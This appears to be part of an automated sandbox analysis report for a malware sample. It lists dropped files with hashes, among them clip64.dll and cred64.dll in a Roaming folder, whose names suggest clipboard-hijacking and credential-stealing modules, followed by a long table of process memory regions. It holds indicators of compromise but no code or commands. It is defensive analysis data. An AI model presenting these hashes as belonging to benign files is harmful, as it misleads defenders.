SHA2568d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a
-
C:\Users\Admin\AppData\Roaming\ajfsfhfFilesize
259KB
MD5207c334a91a12299e376c22995479de3
SHA151936c1ecf3525c88e924656d2e83c3cee3b0e42
SHA2566812deb6d1f5c8a6c4ffffdadf4372cc78626fdddda416084f82ddd167a6ff1d
SHA512133d8affbe0dd0661c9f48692fa38c951d21a4327eda0db474cdf6014943bfa0b605a458a33191e821c3e15150c986975e53cbd7a25633f9d7b3f7f8cfec096f
-
\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dllFilesize
89KB
MD5d3074d3a19629c3c6a533c86733e044e
SHA15b15823311f97036dbaf4a3418c6f50ffade0eb9
SHA256b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401
SHA5127dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf
-
\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
memory/360-202-0x0000000000760000-0x0000000000769000-memory.dmpFilesize
36KB
-
memory/360-238-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/708-214-0x0000000000720000-0x0000000000BB0000-memory.dmpFilesize
4.6MB
-
memory/956-227-0x0000000000400000-0x0000000002B72000-memory.dmpFilesize
39.4MB
-
memory/1148-175-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-168-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-174-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-189-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-205-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-184-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-183-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-181-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-169-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1148-176-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1152-1196-0x0000000000840000-0x0000000000849000-memory.dmpFilesize
36KB
-
memory/1152-1197-0x00000000003D0000-0x00000000003DC000-memory.dmpFilesize
48KB
-
memory/1352-281-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/2068-274-0x00000000030D0000-0x00000000030E6000-memory.dmpFilesize
88KB
-
memory/2068-237-0x0000000002AC0000-0x0000000002AD6000-memory.dmpFilesize
88KB
-
memory/2068-185-0x0000000003100000-0x0000000003116000-memory.dmpFilesize
88KB
-
memory/2068-121-0x0000000000B90000-0x0000000000BA6000-memory.dmpFilesize
88KB
-
memory/2176-276-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/2664-1134-0x000001D50C410000-0x000001D50C432000-memory.dmpFilesize
136KB
-
memory/2664-1132-0x000001D50C400000-0x000001D50C410000-memory.dmpFilesize
64KB
-
memory/2664-1130-0x000001D50C400000-0x000001D50C410000-memory.dmpFilesize
64KB
-
memory/2664-1139-0x000001D525420000-0x000001D525496000-memory.dmpFilesize
472KB
-
memory/3352-1268-0x0000000006AF0000-0x0000000006B00000-memory.dmpFilesize
64KB
-
memory/3352-1269-0x0000000006AF0000-0x0000000006B00000-memory.dmpFilesize
64KB
-
memory/3640-1237-0x00000283AA010000-0x00000283AA020000-memory.dmpFilesize
64KB
-
memory/3640-1230-0x00000283AA010000-0x00000283AA020000-memory.dmpFilesize
64KB
-
memory/3640-1241-0x00000283AA010000-0x00000283AA020000-memory.dmpFilesize
64KB
-
memory/3956-122-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/3956-120-0x0000000000950000-0x0000000000959000-memory.dmpFilesize
36KB
-
memory/4224-1175-0x0000000000650000-0x000000000065B000-memory.dmpFilesize
44KB
-
memory/4224-1176-0x00000000010B0000-0x00000000010BF000-memory.dmpFilesize
60KB
-
memory/4256-305-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-297-0x00000000028E0000-0x00000000028F0000-memory.dmpFilesize
64KB
-
memory/4256-1122-0x00000000028E0000-0x00000000028F0000-memory.dmpFilesize
64KB
-
memory/4256-1119-0x00000000071F0000-0x000000000771C000-memory.dmpFilesize
5.2MB
-
memory/4256-1118-0x0000000007020000-0x00000000071E2000-memory.dmpFilesize
1.8MB
-
memory/4256-1116-0x0000000006FD0000-0x0000000007020000-memory.dmpFilesize
320KB
-
memory/4256-1115-0x0000000006DB0000-0x0000000006DCE000-memory.dmpFilesize
120KB
-
memory/4256-1114-0x0000000006D10000-0x0000000006D86000-memory.dmpFilesize
472KB
-
memory/4256-1113-0x0000000006B60000-0x0000000006BF2000-memory.dmpFilesize
584KB
-
memory/4256-1109-0x0000000005740000-0x00000000057A6000-memory.dmpFilesize
408KB
-
memory/4256-295-0x00000000026B0000-0x000000000270A000-memory.dmpFilesize
360KB
-
memory/4256-296-0x0000000002340000-0x00000000023A2000-memory.dmpFilesize
392KB
-
memory/4256-1121-0x00000000028E0000-0x00000000028F0000-memory.dmpFilesize
64KB
-
memory/4256-299-0x00000000028E0000-0x00000000028F0000-memory.dmpFilesize
64KB
-
memory/4256-298-0x0000000004D60000-0x000000000525E000-memory.dmpFilesize
5.0MB
-
memory/4256-301-0x0000000002870000-0x00000000028C6000-memory.dmpFilesize
344KB
-
memory/4256-300-0x00000000028E0000-0x00000000028F0000-memory.dmpFilesize
64KB
-
memory/4256-1104-0x00000000054B0000-0x00000000054FB000-memory.dmpFilesize
300KB
-
memory/4256-302-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-303-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-1103-0x0000000005420000-0x000000000545E000-memory.dmpFilesize
248KB
-
memory/4256-1102-0x0000000005310000-0x000000000541A000-memory.dmpFilesize
1.0MB
-
memory/4256-307-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-309-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-1101-0x00000000052E0000-0x00000000052F2000-memory.dmpFilesize
72KB
-
memory/4256-1100-0x0000000005870000-0x0000000005E76000-memory.dmpFilesize
6.0MB
-
memory/4256-311-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-322-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-313-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-315-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-317-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4256-319-0x0000000002870000-0x00000000028C2000-memory.dmpFilesize
328KB
-
memory/4280-135-0x00000000048D0000-0x00000000049EB000-memory.dmpFilesize
1.1MB
-
memory/4296-136-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4296-138-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4296-139-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4296-140-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4296-161-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4308-1190-0x0000000000840000-0x0000000000849000-memory.dmpFilesize
36KB
-
memory/4308-1189-0x00000000010B0000-0x00000000010BF000-memory.dmpFilesize
60KB
-
memory/4348-1166-0x0000000000650000-0x000000000065B000-memory.dmpFilesize
44KB
-
memory/4508-156-0x0000000000830000-0x0000000000839000-memory.dmpFilesize
36KB
-
memory/4508-186-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/4676-1235-0x0000000000730000-0x0000000000757000-memory.dmpFilesize
156KB
-
memory/4676-1233-0x00000283AA010000-0x00000283AA020000-memory.dmpFilesize
64KB
-
memory/4820-273-0x0000000000400000-0x0000000002B72000-memory.dmpFilesize
39.4MB
-
memory/4860-1270-0x0000000006EC0000-0x0000000006ED0000-memory.dmpFilesize
64KB
-
memory/4896-1165-0x0000000006D20000-0x0000000006D30000-memory.dmpFilesize
64KB
-
memory/4896-1198-0x0000000006D20000-0x0000000006D30000-memory.dmpFilesize
64KB
-
memory/4896-1163-0x0000000006D20000-0x0000000006D30000-memory.dmpFilesize
64KB
-
memory/4896-1160-0x0000000007360000-0x0000000007988000-memory.dmpFilesize
6.2MB
-
memory/4896-1159-0x0000000001240000-0x0000000001276000-memory.dmpFilesize
216KB
-
memory/4896-1228-0x000000000A550000-0x000000000A596000-memory.dmpFilesize
280KB
-
memory/4896-1212-0x0000000009010000-0x000000000901A000-memory.dmpFilesize
40KB
-
memory/4896-1167-0x0000000006FF0000-0x0000000007012000-memory.dmpFilesize
136KB
-
memory/4896-1209-0x0000000009060000-0x000000000907A000-memory.dmpFilesize
104KB
-
memory/4896-1208-0x000000000A970000-0x000000000AFE8000-memory.dmpFilesize
6.5MB
-
memory/4896-1168-0x0000000007230000-0x0000000007296000-memory.dmpFilesize
408KB
-
memory/4896-1170-0x0000000007B70000-0x0000000007EC0000-memory.dmpFilesize
3.3MB
-
memory/4896-1174-0x0000000007A50000-0x0000000007A6C000-memory.dmpFilesize
112KB
-
memory/4900-282-0x0000000003580000-0x00000000036B4000-memory.dmpFilesize
1.2MB
-
memory/4900-257-0x0000000003400000-0x0000000003573000-memory.dmpFilesize
1.4MB
-
memory/4900-258-0x0000000003580000-0x00000000036B4000-memory.dmpFilesize
1.2MB
-
memory/4960-1245-0x0000000003520000-0x0000000003529000-memory.dmpFilesize
36KB
-
memory/5088-280-0x00007FF62FE20000-0x00007FF6301DD000-memory.dmpFilesize
3.7MB